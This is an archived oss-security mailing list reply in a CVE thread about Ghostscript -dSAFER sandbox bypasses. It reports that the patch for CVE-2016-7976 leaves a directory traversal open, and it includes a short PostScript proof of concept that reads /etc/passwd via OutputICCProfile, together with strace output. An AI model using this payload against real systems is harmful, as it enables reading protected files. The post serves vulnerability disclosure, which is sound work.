Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed, 19 Oct 2016 16:29:43 +0200
From: Cedric Buissart <cbuissar@...hat.com>
To: oss-security@...ts.openwall.com
Cc: taviso@...gle.com
Subject: Re: Re: CVE Request - multiple ghostscript -dSAFER
 sandbox problems

On Wed, Oct 5, 2016 at 8:04 PM, <cve-assign@...re.org> wrote:

>
>
> > bug: various userparams allow %pipe% in paths, allowing remote shell
> > command execution.
> > id: http://bugs.ghostscript.com/show_bug.cgi?id=697178
> > repro: http://www.openwall.com/lists/oss-security/2016/09/30/8
> > patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h=
> 71ac87493b1e445d6c07554d4246cf7d4f44875c
>
> Use CVE-2016-7976.
>
> There currently isn't a separate CVE ID for the earlier impact that
> occurred when "b" was in the mode argument to popen. The question of
> whether popen will execute anyway (even with the 'b" character) is,
> more or less, a reachability concern in this context, and doesn't mean
> that a second vulnerability needs to be defined.
>
> The original report for this bug (http://bugs.ghostscript.com/
show_bug.cgi?id=697178), as described by Florian, was mentioning a
directory traversal issue.
The directory traversal does not appear to be resolved after applying the
given patch :

$ cat putdevice-open.ps
%!PS
currentdevice null true mark /OutputICCProfile (../../../../../etc/passwd)
.putdeviceparams
quit
$ strace -f -e open gs -dSAFER putdevice-open.ps |& grep passwd
open("/usr/share/ghostscript/9.20/iccprofiles/../../../../../etc/passwd",
O_RDONLY) = 6

Is it expected ?

-- 
Cedric Buissart,
Product Security

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ